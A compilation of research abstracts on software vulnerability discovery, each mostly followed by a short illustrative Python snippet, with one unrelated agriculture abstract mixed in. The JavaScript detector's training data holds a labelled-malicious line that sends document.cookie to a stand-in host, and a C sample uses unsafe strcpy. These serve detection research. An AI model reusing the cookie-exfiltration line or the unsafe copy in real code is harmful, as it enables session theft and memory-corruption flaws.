    Toward Data-Driven Discovery of Software Vulnerabilities

    Over the years, Software Engineering, as a discipline, has recognized the potential for engineers to make mistakes and has incorporated processes to prevent such mistakes from becoming exploitable vulnerabilities. These processes span the spectrum from using unit/integration/fuzz testing, static/dynamic/hybrid analysis, and (automatic) patching to discover instances of vulnerabilities to leveraging data mining and machine learning to collect metrics that characterize attributes indicative of vulnerabilities. Among these processes, metrics have the potential to uncover systemic problems in the product, process, or people that could lead to vulnerabilities being introduced, rather than identifying specific instances of vulnerabilities. The insights from metrics can be used to support developers and managers in making decisions to improve the product, process, and/or people with the goal of engineering secure software. Despite empirical evidence of metrics' association with historical software vulnerabilities, their adoption in the software development industry has been limited. The level of granularity at which the metrics are defined, the high false positive rate from models that use the metrics as explanatory variables, and, more importantly, the difficulty in deriving actionable intelligence from the metrics are often cited as factors that inhibit metrics' adoption in practice. Our research vision is to assist software engineers in building secure software by providing a technique that generates scientific, interpretable, and actionable feedback on security as the software evolves. In this dissertation, we present our approach toward achieving this vision through (1) systematization of vulnerability discovery metrics literature, (2) unsupervised generation of metrics-informed security feedback, and (3) continuous developer-in-the-loop improvement of the feedback. We systematically reviewed the literature to enumerate metrics that have been proposed and/or evaluated to be indicative of vulnerabilities in software and to identify the validation criteria used to assess the decision-informing ability of these metrics. In addition to enumerating the metrics, we implemented a subset of these metrics as containerized microservices. We collected the metric values from six large open-source projects and assessed metrics' generalizability across projects, application domains, and programming languages. We then used an unsupervised approach from literature to compute threshold values for each metric and assessed the thresholds' ability to classify risk from historical vulnerabilities. We used the metrics' values, thresholds, and interpretation to provide developers natural language feedback on security as they contributed changes and used a survey to assess their perception of the feedback. We initiated an open dialogue to gain an insight into their expectations from such feedback. In response to developer comments, we assessed the effectiveness of an existing vulnerability discovery approach—static analysis—and that of vulnerability discovery metrics in identifying risk from vulnerability-contributing commits
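
    As a rough illustration of how unsupervised metric thresholds can be turned into risk flags, the sketch below derives a quantile-based threshold per metric and flags entities that exceed it. The metric names, sample values, and the 90th-percentile cut-off are illustrative assumptions; the dissertation's actual thresholding approach is taken from the literature and may differ.

```python
# Illustrative only: quantile-based thresholding is one common unsupervised
# scheme for turning metric distributions into risk flags; the metric names,
# data, and the 0.90 quantile are assumptions, not the dissertation's method.
from statistics import quantiles

def derive_threshold(values, q=0.90):
    """Return the q-quantile of a metric's observed values as its threshold."""
    # quantiles() with n=100 yields the 1st..99th percentiles.
    return quantiles(values, n=100)[int(q * 100) - 1]

def flag_risky(entities, metric, threshold):
    """Flag entities whose metric value exceeds the unsupervised threshold."""
    return [name for name, metrics in entities.items() if metrics[metric] > threshold]

# Hypothetical per-file metric values (e.g., churn, nesting depth).
files = {
    "parser.c": {"churn": 120, "nesting": 7},
    "util.c":   {"churn": 15,  "nesting": 2},
    "net.c":    {"churn": 340, "nesting": 9},
}

churn_threshold = derive_threshold([m["churn"] for m in files.values()])
print("churn threshold:", churn_threshold)
print("flagged:", flag_risky(files, "churn", churn_threshold))
```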

    Studying JavaScript Security Through Static Analysis

    As the Internet keeps on growing, so does the interest of malicious actors. While the Internet has become widespread and popular to interconnect billions of people, this interconnectivity also simplifies the spread of malicious software. Specifically, JavaScript has become a popular attack vector, as it enables attackers to stealthily exploit bugs and further vulnerabilities to compromise the security and privacy of Internet users. In this thesis, we approach these issues by proposing several systems to statically analyze real-world JavaScript code at scale. First, we focus on the detection of malicious JavaScript samples. To this end, we propose two learning-based pipelines, which leverage syntactic, control- and data-flow based features to distinguish benign from malicious inputs. Subsequently, we evaluate the robustness of such static malicious JavaScript detectors in an adversarial setting. For this purpose, we introduce a generic camouflage attack, which consists of rewriting malicious samples to reproduce existing benign syntactic structures. Finally, we consider vulnerable browser extensions. In particular, we abstract an extension's source code at a semantic level, including control, data, and message flows, and pointer analysis, to detect suspicious data flows from and toward an extension's privileged context. Overall, we report on 184 Chrome extensions that attackers could exploit to, e.g., execute arbitrary code in a victim's browser
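
    The following sketch illustrates the general shape of such a learning-based detector over static features: lexical tokens are extracted from JavaScript sources and fed to a classifier. The regex tokenizer, toy corpus, and random forest here are simplifying assumptions; the detectors described above rely on richer AST, control-flow, and data-flow features.

```python
# Minimal sketch of a learning-based detector over static lexical features.
# The regex tokenizer, training samples, and labels are illustrative only.
import re
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.ensemble import RandomForestClassifier
from sklearn.pipeline import make_pipeline

def lex(js_source: str) -> str:
    """Very rough lexer: keep identifiers, keywords, and punctuation as tokens."""
    return " ".join(re.findall(r"[A-Za-z_$][\w$]*|[{}()\[\];.,<>=!+\-*/%&|^~?:]", js_source))

# Hypothetical training corpus: (script source, label) with 1 = malicious.
corpus = [
    ("var x = document.cookie; new Image().src = 'http://evil.example/?c=' + x;", 1),
    ("function add(a, b) { return a + b; } console.log(add(2, 3));", 0),
]
texts = [lex(src) for src, _ in corpus]
labels = [label for _, label in corpus]

# Token 1- to 3-grams feed a random forest, standing in for the richer
# syntactic/flow-based features used by the real detectors.
model = make_pipeline(
    CountVectorizer(token_pattern=r"\S+", ngram_range=(1, 3)),
    RandomForestClassifier(n_estimators=100, random_state=0),
)
model.fit(texts, labels)
print(model.predict([lex("window.location = 'http://evil.example';")]))
```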

    Automated vulnerability detection in source code

    Technological advances have facilitated instant global connectivity, transforming the way we interact with the world. Software, propelled by this evolution, plays a pivotal role in our daily lives, being present in virtually every facet of our existence. Programmers, who form the bedrock of the business structure, create source code comprising hundreds or even thousands of lines, encompassing essential functionalities for software to operate seamlessly. However, owing to the inherent complexity of these functionalities and their interdependencies, it is common for errors to escape notice in the code, inadvertently reaching the software production phase and resulting in code vulnerabilities. Each year, the number of identified software vulnerabilities, either publicly disclosed or discovered internally, increases. These vulnerabilities pose a significant risk of exploitation, potentially leading to data breaches or service interruptions. Therefore, the goal of this project is to develop a tool capable of analyzing code written in C and C++ to detect vulnerabilities before the code is deployed to end users. To achieve this goal, we leveraged existing work in this area by using a dataset of open-source functions written in C and C++. This dataset contains approximately 1.27 million functions categorized into five different Common Weakness Enumerations (CWEs). Preprocessing was performed to optimize the performance of the models used. The models were trained on function snippets only, without considering any external context of the code, thus simplifying the problem and increasing processing efficiency. The results obtained are promising, with the trained models showing high performance in identifying and classifying vulnerabilities. In addition, these results can serve as a benchmark for direct comparisons between different approaches
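
    As a minimal baseline sketch of classifying function snippets into CWE categories, the example below fits a TF-IDF model over raw function text. The toy functions, labels, and linear classifier are assumptions for illustration only and are not the models evaluated in this work.

```python
# Tiny baseline sketch for classifying function snippets into CWE categories.
# The real dataset has ~1.27M C/C++ functions; the snippets, CWE labels, and
# the TF-IDF + linear model choice here are illustrative assumptions.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

functions = [
    "void copy(char *dst, const char *src) { strcpy(dst, src); }",
    "int idx(int *a, int n, int i) { return a[i]; }",
    "void ok(char *dst, size_t n, const char *src) { strncpy(dst, src, n - 1); dst[n - 1] = 0; }",
]
labels = ["CWE-120", "CWE-125", "benign"]  # hypothetical labels

model = make_pipeline(
    TfidfVectorizer(token_pattern=r"[A-Za-z_]\w*|\S"),  # keep identifiers and operators
    LogisticRegression(max_iter=1000),
)
model.fit(functions, labels)
print(model.predict(["void f(char *d, const char *s) { strcpy(d, s); }"]))
```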

    A Human-Centric Approach to Software Vulnerability Discovery

    Software security bugs, referred to as vulnerabilities, persist as an important and costly challenge. Significant effort has been exerted toward automatic vulnerability discovery, but human intelligence generally remains required and will remain necessary for the foreseeable future. Therefore, many companies have turned to internal and external (e.g., penetration testing, bug bounties) security experts to manually analyze their code for vulnerabilities. Unfortunately, there are a limited number of qualified experts. Therefore, to improve software security, we must understand how experts search for vulnerabilities and how their processes could be made more efficient, by improving tool usability and targeting the most common vulnerabilities. Additionally, we seek to understand how to improve training to increase the number of experts. To answer these questions, I begin with an in-depth qualitative analysis of secure development competition submissions to identify common vulnerabilities developers introduce. I found developers struggle to understand and implement complex security concepts, not recognizing how nuanced development decisions could lead to vulnerabilities. Next, using a cognitive task analysis to investigate experts' and non-experts' vulnerability discovery processes, I observed they use the same process, but differ in the variety of security experiences which inform their searches. Together, these results suggest exposure to an in-depth understanding of potential vulnerabilities as essential for vulnerability discovery. As a first step to leverage both experts and non-experts, I pursued two lines of work: education to support experience development and vulnerability discovery automation interaction improvements. To improve vulnerability discovery tool interaction, I conducted observational interviews of experts' reverse engineering process, an essential and time-consuming component of vulnerability discovery. From this, I provide guidelines for more usable interaction design. For security education, I began with a pedagogical review of security exercises to identify their current strengths and weaknesses. I also developed a psychometric measure for secure software development self-efficacy to support comparisons between educational interventions

    Securing the Next Generation Web

    With the ever-increasing digitalization of society, the need for secure systems is growing. While some security features, like HTTPS, are popular, securing web applications and the clients we use to interact with them remains difficult. To secure web applications we focus on both the client-side and server-side. For the client-side, mainly web browsers, we analyze how new security features might solve a problem but introduce new ones. We show this by performing a systematic analysis of the new Content Security Policy (CSP) directive navigate-to. In our research, we find that it does introduce new vulnerabilities, to which we recommend countermeasures. We also create AutoNav, a tool capable of automatically suggesting navigation policies for this directive. Finding server-side vulnerabilities in a black-box setting where there is no access to the source code is challenging. To improve this, we develop novel black-box methods for automatically finding vulnerabilities. We accomplish this by identifying key challenges in web scanning and combining the best of previous methods. Additionally, we leverage SMT solvers to further improve the coverage and vulnerability detection rate of scanners. In addition to browsers, browser extensions also play an important role in the web ecosystem. These small programs, e.g. AdBlockers and password managers, have powerful APIs and access to sensitive user data like browsing history. By systematically analyzing the extension ecosystem we find new static and dynamic methods for detecting both malicious and vulnerable extensions. In addition, we develop a method for detecting malicious extensions solely based on the meta-data of downloads over time. We analyze new attack vectors introduced by Google’s new vehicle OS, Android Automotive. This is based on Android with the addition of vehicle APIs. Our analysis results in new attacks pertaining to safety, privacy, and availability. Furthermore, we create AutoTame, which is designed to analyze third-party apps for vehicles for the vulnerabilities we found
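
    A minimal sketch of the policy-suggestion idea behind AutoNav is shown below: observed navigation targets are collapsed into a draft navigate-to directive value. The navigate-to directive is a proposed CSP feature, and the crawl data, origin handling, and output format here are simplifying assumptions rather than AutoNav's actual inference logic.

```python
# Minimal sketch of suggesting a navigation policy from observed navigations.
# The navigations, origin extraction, and output format are assumptions.
from urllib.parse import urlsplit

def suggest_navigate_to(observed_navigations):
    """Collapse observed navigation target URLs into a draft navigate-to value."""
    origins = set()
    for url in observed_navigations:
        parts = urlsplit(url)
        if parts.scheme and parts.netloc:
            origins.add(f"{parts.scheme}://{parts.netloc}")
    # 'self' covers relative/same-site navigations.
    return "navigate-to 'self' " + " ".join(sorted(origins))

# Hypothetical navigations recorded while crawling a site.
seen = [
    "https://example.com/checkout",
    "https://pay.example.com/session/123",
    "/help",  # relative navigation, covered by 'self'
]
print("Content-Security-Policy:", suggest_navigate_to(seen))
```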

    Security considerations in the open source software ecosystem

    Open source software plays an important role in the software supply chain, allowing stakeholders to utilize open source components as building blocks in their software, tooling, and infrastructure. But relying on the open source ecosystem introduces unique challenges, both in terms of security and trust, as well as in terms of supply chain reliability. In this dissertation, I investigate approaches, considerations, and encountered challenges of stakeholders in the context of security, privacy, and trustworthiness of the open source software supply chain. Overall, my research aims to empower and support software experts with the knowledge and resources necessary to achieve a more secure and trustworthy open source software ecosystem. In the first part of this dissertation, I describe a research study investigating the security and trust practices in open source projects by interviewing 27 owners, maintainers, and contributors from a diverse set of projects to explore their behind-the-scenes processes, guidance and policies, incident handling, and encountered challenges, finding that participants’ projects are highly diverse in terms of their deployed security measures and trust processes, as well as their underlying motivations. More on the consumer side of the open source software supply chain, I investigated the use of open source components in industry projects by interviewing 25 software developers, architects, and engineers to understand their projects’ processes, decisions, and considerations in the context of external open source code, finding that open source components play an important role in many of the industry projects, and that most projects have some form of company policy or best practice for including external code. On the side of end-user focused software, I present a study investigating the use of software obfuscation in Android applications, which is a recommended practice to protect against plagiarism and repackaging. The study leveraged a multi-pronged approach including a large-scale measurement, a developer survey, and a programming experiment, finding that only 24.92% of apps are obfuscated by their developer, that developers do not fear theft of their own apps, and that they have difficulties obfuscating their own apps. Lastly, to involve end users themselves, I describe a survey with 200 users of cloud office suites to investigate their security and privacy perceptions and expectations, with findings suggesting that users are generally aware of basic security implications, but lack technical knowledge for envisioning some threat models. The key findings of this dissertation include that open source projects have highly diverse security measures, trust processes, and underlying motivations; that the projects’ security and trust needs are likely best met in ways that consider their individual strengths, limitations, and project stage, especially for smaller projects with limited access to resources; and that open source components play an important role in industry projects, where those projects often have some form of company policy or best practice for including external code, but developers wish for more resources to better audit included components. 
This dissertation emphasizes the importance of collaboration and shared responsibility in building and maintaining the open source software ecosystem, with developers, maintainers, end users, researchers, and other stakeholders alike ensuring that the ecosystem remains a secure, trustworthy, and healthy resource for everyone to rely on
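
    As an illustration of the obfuscation-measurement angle mentioned above, the sketch below applies a crude heuristic that flags ProGuard-style identifier renaming when most simple class names in a decompiled app are one or two letters. The class lists, the heuristic, and the threshold are assumptions; the study's actual measurement methodology is more involved.

```python
# Rough heuristic sketch for spotting ProGuard-style identifier renaming from
# a decompiled app's class list. The class names, the single-letter heuristic,
# and the 0.5 threshold are illustrative assumptions.
import re

SHORT_NAME = re.compile(r"^[a-z]{1,2}$")

def looks_name_obfuscated(class_names, threshold=0.5):
    """Flag an app if most of its simple class names are one or two letters."""
    simple = [name.rsplit(".", 1)[-1] for name in class_names]
    short = sum(1 for s in simple if SHORT_NAME.match(s))
    return len(simple) > 0 and short / len(simple) >= threshold

# Hypothetical class lists extracted from two APKs.
app_a = ["com.example.a", "com.example.b", "com.example.c"]
app_b = ["com.example.MainActivity", "com.example.net.ApiClient"]
print(looks_name_obfuscated(app_a))  # True
print(looks_name_obfuscated(app_b))  # False
```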

    Production of Innovations within Farmer–Researcher Associations Applying Transdisciplinary Research Principles

    Small-scale farmers in sub-Saharan West Africa depend heavily on local resources and local knowledge. Science-based knowledge is likely to aid decision-making in complex situations. In this presentation, we highlight a FiBL-coordinated research partnership between three national producer organisations and national agriculture research bodies in Mali, Burkina Faso, and Benin. The partnership seeks to compare conventional, GMO-based, and organic cotton systems as regards food security and climate change

    Towards an Improved Understanding of Software Vulnerability Assessment Using Data-Driven Approaches

    Software Vulnerabilities (SVs) can expose software systems to cyber-attacks, potentially causing enormous financial and reputational damage for organizations. There have been significant research efforts to detect these SVs so that developers can promptly fix them. However, fixing SVs is complex and time-consuming in practice, and thus developers usually do not have sufficient time and resources to fix all SVs at once. As a result, developers often need SV information, such as exploitability, impact, and overall severity, to prioritize fixing more critical SVs. Such information required for fixing planning and prioritization is typically provided in the SV assessment step of the SV lifecycle. Recently, data-driven methods have been increasingly proposed to automate SV assessment tasks. However, there are still numerous shortcomings with the existing studies on data-driven SV assessment that would hinder their application in practice. This PhD thesis aims to contribute to the growing literature in data-driven SV assessment by investigating and addressing the constant changes in SV data as well as the lack of consideration of source code and developers’ needs for SV assessment that impede the practical applicability of the field. Particularly, we have made the following five contributions in this thesis. (1) We systematize the knowledge of data-driven SV assessment to reveal the best practices of the field and the main challenges affecting its application in practice. Subsequently, we propose various solutions to tackle these challenges to better support the real-world applications of data-driven SV assessment. (2) We first demonstrate the existence of the concept drift (changing data) issue in descriptions of SV reports that current studies have mostly used for predicting the Common Vulnerability Scoring System (CVSS) metrics. We augment report-level SV assessment models with subwords of terms extracted from SV descriptions to help the models more effectively capture the semantics of ever-increasing SVs. (3) We also identify that SV reports are usually released after SV fixing. Thus, we propose using vulnerable code to enable earlier SV assessment without waiting for SV reports. We are the first to use Machine Learning techniques to predict CVSS metrics on the function level, leveraging vulnerable statements directly causing SVs and their context in code functions. The performance of our function-level SV assessment models is promising, opening up research opportunities in this new direction. (4) To facilitate continuous integration of software code nowadays, we present a novel deep multi-task learning model, DeepCVA, to simultaneously and efficiently predict multiple CVSS assessment metrics on the commit level, specifically using vulnerability-contributing commits. DeepCVA is the first work that enables practitioners to perform SV assessment as soon as vulnerable changes are added to a codebase, supporting just-in-time prioritization of SV fixing. (5) Besides code artifacts produced from a software project of interest, SV assessment tasks can also benefit from SV crowdsourcing information on developer Question and Answer (Q&A) websites. We automatically retrieve large-scale security/SV-related posts from these Q&A websites. We then apply a topic modeling technique on these posts to distill developers’ real-world SV concerns that can be used for data-driven SV assessment. 
    Overall, we believe that this thesis has provided evidence-based knowledge and useful guidelines for researchers and practitioners to automate SV assessment using data-driven approaches. Thesis (Ph.D.) -- University of Adelaide, School of Computer Science, 202
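
    As a small stand-in for report-level CVSS prediction with subword-style features, the sketch below uses character n-gram TF-IDF, which keeps capturing subword units when new vulnerability terminology appears over time. The example descriptions, labels, and model choice are hypothetical and are not the thesis's actual models.

```python
# Minimal stand-in for report-level CVSS metric prediction with subword-style
# features. The SV descriptions, CVSS-derived labels, and the char n-gram
# TF-IDF + linear model below are illustrative assumptions.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

descriptions = [
    "Buffer overflow in the image parser allows remote code execution.",
    "Improper access control lets local users read configuration files.",
    "SQL injection in the login form allows attackers to bypass authentication.",
]
severity = ["CRITICAL", "MEDIUM", "HIGH"]  # one hypothetical label per report

model = make_pipeline(
    # char_wb n-grams capture subword units such as "overfl" or "inject",
    # which keep working when new vulnerability terms appear over time.
    TfidfVectorizer(analyzer="char_wb", ngram_range=(3, 5)),
    LogisticRegression(max_iter=1000),
)
model.fit(descriptions, severity)
print(model.predict(["Heap overflow in the font renderer enables code execution."]))
```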